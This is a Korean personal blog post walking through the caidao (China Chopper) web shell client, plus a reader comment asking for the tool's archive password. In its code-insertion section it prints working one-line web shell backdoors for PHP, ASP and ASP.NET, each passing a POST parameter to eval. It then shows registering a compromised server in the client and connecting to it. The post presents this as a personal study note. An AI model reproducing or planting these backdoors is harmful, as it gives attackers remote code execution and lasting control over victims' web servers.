블로그 이미지
공부하는 것을 정리해서 올려둔 블로그입니다.
신사과

Notice

Recent Comment

Recent Trackback

Archive

calendar

  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31      
  • 385,927total
  • 27today
  • 21yesterday

'2018/01'에 해당되는 글 1건

  1. 2018.01.09 caidao-20160620 웹쉘 (1)
2018.01.09 21:35 해킹/웹해킹

caidao-20160620 웹쉘 



caldao.exe 를 실행합니다.

그러면 아래와 같이 초기화면을 확인 할 수 있습니다.




초기화면의 예시 중 php의 설정을 확인 해보도록 하겠습니다.





제 이름으로 하나 탭을 따로 만들 었습니다.



 



caidao-20160620 웹쉘_ 코드 삽입 


caidao-20160620 웹쉘은 3가지 언어를 이용해 삽입 할 수 있습니다.


php :        <?php @eval($_POST[\'moonho\']);?>


ASP:         <%eval request("moonho")%>


ASP.NET :  <%@ Page Language="Jscript"%><%eval(Request.item["moonho"],unsafe;)%> 





삽입 후 모습입니다.




caidao-20160620 웹쉘_ 서버접속



만든 탭에 들어간 후 add를 이용하여 서버를 입력해 줍니다.





이런식으로 설정을 해줍니다.





등록이 되었습니다.

접속 하도록 하겠습니다.




접속 성공.






참조 사이트 :


 http://blog.naver.com/PostView.nhn?blogId=koromoon&logNo=220809628069&categoryNo=15&parentCategoryNo=0&viewDate=¤tPage=1&postListTopCurrentPage=1&from=search


'해킹 > 웹해킹' 카테고리의 다른 글

caidao-20160620 웹쉘  (1) 2018.01.09
posted by 신사과

댓글을 달아 주세요

  1. asdf 2018.08.27 16:21  Addr  Edit/Del  Reply

    혹시 Caidao-20160620 이 파일 7z 패스워드 알 수 있나요. 홈페이지 접속이 안되서 비밀번호를 알 수가 없네요